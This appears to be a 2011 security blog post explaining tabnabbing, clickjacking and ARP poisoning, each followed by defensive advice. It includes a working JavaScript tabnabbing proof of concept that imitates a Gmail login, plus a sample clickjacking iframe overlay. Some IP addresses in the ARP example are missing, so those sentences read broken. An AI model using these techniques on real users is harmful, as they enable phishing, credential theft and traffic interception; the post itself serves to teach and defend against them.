Monday, April 18, 2011


  • What is Tabnabbing ?

Tabnabbing is a phishing attack that persuades users to submit their login details and passwords to popular web sites by impersonating those sites in a tab the user left open, and convincing the user that the site is genuine. The attack's name was coined in early 2010 by Aza Raskin, a security researcher and design expert.

  • How Tabnabbing Works ?

1. A user navigates to your normal looking site.

2. You detect when the page has lost its focus and hasn’t been interacted with for a while.

3. Replace the favicon with the Gmail favicon, the title with "Gmail: Email from Google", and the page with a Gmail login look-alike. This can all be done with a little bit of JavaScript and happens instantly.

4. As the user scans their many open tabs, the favicon and title act as a strong visual cue - memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.

5. After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.

You can make this attack even more effective by changing the copy: Instead of having just a login screen, you can mention that the session has timed out and the user needs to re-authenticate. This happens often on bank websites, which makes them even more susceptible to this kind of attack.

  • Source Code:

// Aza Raskin's tabnabbing proof of concept: once the tab has been out of focus for
// a few seconds, swap its title, favicon and visible content for a look-alike login page.
var TIMER = null;
var HAS_SWITCHED = false;
var FAKE_FAVICON = "";   // URL of the impersonated site's favicon; the value is not preserved on this page

// Start the countdown when the tab loses focus; cancel it if the user comes straight back.
window.onblur = function(){
    TIMER = setTimeout(changeItUp, 5000);
};

window.onfocus = function(){
    if(TIMER) clearTimeout(TIMER);
};

function setTitle(text){ document.title = text; }

// Helper for reading and replacing the <link rel="shortcut icon"> in <head>.
var favicon = {
    docHead: document.getElementsByTagName("head")[0],
    set: function(url){
        this.addLink(url);
    },
    addLink: function(iconURL) {
        var link = document.createElement("link");
        link.type = "image/x-icon";
        link.rel = "shortcut icon";
        link.href = iconURL;
        this.removeLinkIfExists();
        this.docHead.appendChild(link);
    },
    removeLinkIfExists: function() {
        var links = this.docHead.getElementsByTagName("link");
        for (var i=0; i<links.length; i++) {
            var link = links[i];
            if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
                this.docHead.removeChild(link);
                return;
            }
        }
    },
    get: function() {
        var links = this.docHead.getElementsByTagName("link");
        for (var i=0; i<links.length; i++) {
            var link = links[i];
            if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
                return link.href;
            }
        }
        return null;
    }
};

// Cover the whole viewport with a white layer that holds an image of the fake login page.
function createShield(){
    var div = document.createElement("div");
    div.style.position = "fixed";
    div.style.top = "0";
    div.style.left = "0";
    div.style.backgroundColor = "white";
    div.style.width = "100%";
    div.style.height = "100%";
    div.style.textAlign = "center";
    div.style.overflow = "hidden";

    var img = document.createElement("img");
    img.style.paddingTop = "15px";
    img.src = "";   // image of the look-alike login page; the URL is not preserved on this page

    var oldTitle = document.title;
    var oldFavicon = favicon.get() || "/favicon.ico";

    // In the demo a click on the shield stands in for submitting the form:
    // the shield is removed and the real title and favicon come back.
    img.onclick = function(){
        div.parentNode.removeChild(div);
        document.body.style.overflow = "auto";
        setTitle(oldTitle);
        favicon.set(oldFavicon);
    };

    div.appendChild(img);
    document.body.appendChild(div);
    document.body.style.overflow = "hidden";
}

// Fires once the tab has been in the background for five seconds.
function changeItUp(){
    if( HAS_SWITCHED == false ){
        setTitle( "Gmail: Email from Google");
        favicon.set(FAKE_FAVICON);
        createShield();
        HAS_SWITCHED = true;
    }
}


  • Protection:

1. Keep your web browser up-to-date. Also make sure that plugins and extensions are up-to-date and from trusted sources.

2. The NoScript extension for Firefox defends both from the JavaScript-based and from the scriptless attack, based on meta refresh, by preventing inactive tabs from changing the location of the page.

3. Pay attention to the address in your browser’s toolbar, especially when it comes to login pages. It’s easy to get into muscle-memory mode and just assume that a tab is unchanged, but for important user accounts, keep an eye on that location bar.

4. Consider using some sort of password management tool. Raskin points to the Firefox Account Manager as one way of letting the browser act as your identity manager, but plugins and tools like 1Password are good choices too. Rather than typing user names and passwords in by hand, use a manager that fills credentials only when the site's origin (scheme, host and port) matches the entry stored in its database; a look-alike page served from another origin then simply gets nothing.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...


  • What is Clickjacking ?

Clickjacking is a malicious technique of tricking web users into clicking on something other than what they see, so that they reveal confidential information or perform actions on another site without knowing it, while they believe they are clicking on a harmless web page.

Clickjacking involves placing a fake graphical overlay on top of an existing web page (or the existing page, made invisible, on top of a fake one) in order to change what the user sees while preserving the page's functionality (buttons, forms, etc.). This is done with the intention of misleading users into interacting with the hidden web page while they believe they are interacting with a completely different web site.

  • Description:

Using only CSS z-index and an HTML iframe, an attacker can load the victim web page, with its privileged buttons, into a transparent iframe on top of his own page. Underneath this transparent iframe the attacker puts content, like a game, that entices the user to click. You may think you're playing a game when you're actually starting a webcam recording.

Sample Script Code:

<!-- The iframe is kept 40% visible and the src is left empty here so the layering can be seen;
     a real attack sets opacity to 0 and points src at the victim page. -->
<div style="z-index:2; position:absolute; top:0; left:0; width:70%; height:70%">
  <iframe src="" id="frame1" style="opacity:0.4; filter:alpha(opacity=40);" width="100%" height="100%"
          onmouseover="this.style.opacity=0.5; if(this.filters) this.filters.alpha.opacity=50"
          onmouseout="this.style.opacity=0; if(this.filters) this.filters.alpha.opacity=0"></iframe>
</div>
<div align="right" style="position:absolute; top:0; left:0; z-index:1; width:70%; height:70%; background-color:yellow; text-align:left;">
  <strong>This is an example of how a simple clickjacking attack is done by a malicious site.</strong><br/>
</div>


This technique is called an iframe overlay. In the classic illustration of it, the malicious web page includes code that generates the fake UI and an iframe that points to an email application on a different domain. The two are combined so that the top-level page covers every part of the iframe except the "Yes" button of a "delete all messages?" prompt, and the user can easily be tricked into deleting all the messages in his inbox. In the sample above the iframe is deliberately left partly visible; an attacker would set its opacity to 0.


One of the most notorious examples of Clickjacking was an attack against the Adobe Flash plugin settings page. By loading this page into an invisible iframe, an attacker could trick a user into altering the security settings of Flash, giving permission for any Flash animation to utilize the computer's microphone and camera.


Clickjacking is behind many of the scams that have hit Facebook over the years. They lure users with status updates like "OMG This Guy Went a Little Too Far with His Revenge on His Ex-Girlfriend". On clicking the link, the page asks the user to complete a validation test to prove that the response is not coming from a computer. By responding, users are actually clicking Facebook's "share" and "like" buttons, and posting the message to their own wall.

  • Protection:

On the user's side, the best-known defense against clickjacking attacks is to use Firefox with the NoScript add-on installed. The site being attacked can also protect itself by refusing to be displayed inside a frame on other origins, which is what the X-Frame-Options response header is for.

The default protections that NoScript has provided for a long time, i.e. JavaScript and plugin blocking, prevent most clickjacking attacks. Since version 1.8.2, NoScript also provides a protection called ClearClick, which defeats clickjacking whether or not frames are blocked.



  • What is ARP ?
The Address Resolution Protocol (ARP) is a computer networking protocol for determining a network host's hardware (MAC, link-layer) address when only its Internet-layer (IP) address is known. In effect it maps IP addresses to MAC addresses on the local network.

Broadcast ARP Request:

Jessica, the receptionist, tells Word to print the latest company contact list. This is her first print job today. Her computer (IP address wants to send the print job to the office's HP LaserJet printer (IP address So Jessica's computer broadcasts an ARP Request to the entire local network asking, "Who has the IP address,"

Unicast ARP Reply:

All the devices on the network ignore this ARP Request, except for the HP LaserJet printer. The printer recognizes its own IP in the request and sends an ARP Reply: "Hey, my IP address is Here is my MAC address: 00:90:7F:12:DE:7F"

  • ARP Poisoning:
Address Resolution Protocol (ARP) spoofing, also known as ARP poisoning or ARP Poison Routing (APR), is a technique used to attack an Ethernet wired or wireless network. ARP Spoofing may allow an attacker to sniff data frames on a local area network (LAN), modify the traffic, or stop the traffic altogether.

The ability to associate any IP address with any MAC address provides hackers with many attack vectors, including Denial of Service (DoS), Man in the Middle, and MAC Flooding.

  • Man in the Middle Attack (MITM):
A hacker can exploit ARP cache poisoning to intercept network traffic between two devices in your network.

Attack Stage-1:

The hacker wants to see all the traffic between your computer,, and your Internet router, The hacker begins by sending a malicious ARP "reply" (for which there was no previous request) to your router, associating his computer's MAC address with

Attack Stage-2:

Now your router thinks the hacker's computer is your computer. Next, the hacker sends a malicious ARP reply to your computer, associating his MAC Address with

Attack Stage-3:

Now your machine thinks the hacker's computer is your router. Finally, the hacker turns on an operating system feature called IP forwarding. This makes the hacker's machine pass on the traffic it receives from your computer to the router and the router's replies back to you, so that you keep working normally and notice nothing while every packet passes through the hacker's machine. Without forwarding, the poisoning simply cuts you off, which is the denial-of-service variant.

  • ARP Poisoning Tool:
Ettercap is a suite for man in the middle attacks on a LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.


  • Protection:
1. Arpwatch is a software tool for monitoring Address Resolution Protocol traffic on a computer network. It keeps a table of IP-to-MAC pairings and reports when a pairing changes or a new one appears, which is how network administrators detect ARP spoofing.

2. Arping is a software tool that sends ARP requests to discover hosts on a computer network. It is analogous in function to ping, which probes hosts using the Internet Control Message Protocol at the Internet Layer (OSI Layer 3). Because it asks the network directly, it can be used to check which MAC address currently answers for an IP, and whether more than one does.

3. Capsa Network Analyzer (Packet Sniffer) is an easy-to-use Ethernet network analyzer (aka. packet sniffer or protocol analyzer) for network monitoring and troubleshooting purposes.
